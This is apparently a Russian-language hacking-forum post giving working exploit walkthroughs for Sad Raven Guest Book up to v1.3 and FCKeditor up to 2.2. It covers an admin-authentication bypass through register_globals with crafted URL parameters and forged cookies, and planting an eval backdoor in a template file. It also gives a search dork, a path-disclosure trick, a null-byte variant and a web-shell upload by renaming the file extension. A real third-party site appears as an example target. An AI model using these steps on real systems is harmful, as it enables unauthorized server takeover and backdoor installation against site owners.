В теме есть часть информации по нижеследующему, но не так подробно:
Sad Raven Guest Book <=v1.3
Она же sr guest.
Вход в админ панель:
Код:
<?php
if (!isset($alogin) || md5($pass) != $Password[$alogin] || !isset($Password[$alogin]))
?>
1. Админка находится по адресу: http://site.com/guest/admin.php
2. Зайти можно с таким запросом (условие -
register globals=on):
Код:
http://site.com/guest/admin.php?pass=3105&alogin=3105&Password[3105]=37e7897f62e8d91b1ce60515829ca282
3105 - цифра от балды, а 37e7897f62e8d91b1ce60515829ca282 - это md5(3105)
но мы пока не админы, т.к. в админку пустило, но при попытке выполнить какие-либо действия в админке нас опять выкидывает на залогивание, смотрим:
1. После перехода по ссылке выше у нас появятся две куки:
Код:
Имя:
alogin
Содержимое:
3105
Узел:
site.com
Путь:
/guest/
Имя:
pass
Содержимое:
3105
Узел:
site.com
Путь:
/guest/
к которым надо будет добавить третью (через тот же плагин для FF
cookie editor):
Код:
Имя:
Password[3105]
Содержимое:
37e7897f62e8d91b1ce60515829ca282
Узел:
site.com
Путь:
/guest/
и вот тогда мы уже полноценные админы
2.
Заливка шелла:
- Идем в http://site.com/guest/admin.php?design
- Правим footer.inc.php - вставляем
Код:
<?php eval(stripslashes($_GET[e]));?>
для 100% уверенности, обходим
magic_quotes=ON
3. проверяем:
http://site.com/guest/index.php?e=phpinfo();
4. Льем шелл.
====================================
fckeditor <=2.2
возможны версии чуть выше:
dork: inurl:dialog/fck_about.html
Раскрытие пути заливки файла:
1. Идем по адресу - editor/filemanager/browser/default/connectors/test.html
может отличаться, всегда поймете что искать идя от корня (если доступен просмотр папок с веба)
2. Выставляем Connector: - PHP
3. Жмем "Get Folders and Files" - появляется примерно такое среди всего прочего:
url="/config/_uploads/File/"/>
что есть абсолютный путь куда будут заливаться файлы относительно корня сайта, она же
папка, доступная на запись.
Залитие шелла:
1. Connector: - PHP
2. Переименовываем шелл (например wso2.php) в wso2.php.xss - т.е. на конце задаем несуществующее расширение файла.
3. Заливаем
4. Переходим по ссылке (исходя из примера выше):
http://site.com/config/_uploads/File/wso2.php.xss
и всё, у вас полноценный шелл
бонус:
в очень многих даже пропатченных и современных версиях fceditor все равно есть уязвимости, например раскрытие асболютного пути сервера, если заливать корректный тип файла, но в поле "Current Folder" подставить что-то вроде:
ini.php%00
часто вываливается ошибка записи из tmp-директории с полным путем к управляющему скрипту
PS: fceditor используется в большинстве CMS - редактирование новости, загрузка картинок, редактирование страниц - всё он практически, полный путь к fceditor можно узнать попытавшись вставить картинку в тело новости и нажать на то, что сверху в этом окошке, типо title - открывается веб-путь к fceditor.
Проверить версию (пример) -
Код:
http://topkredite.ch/_admin/_system/htmleditor/editor/dialog/fck_about.html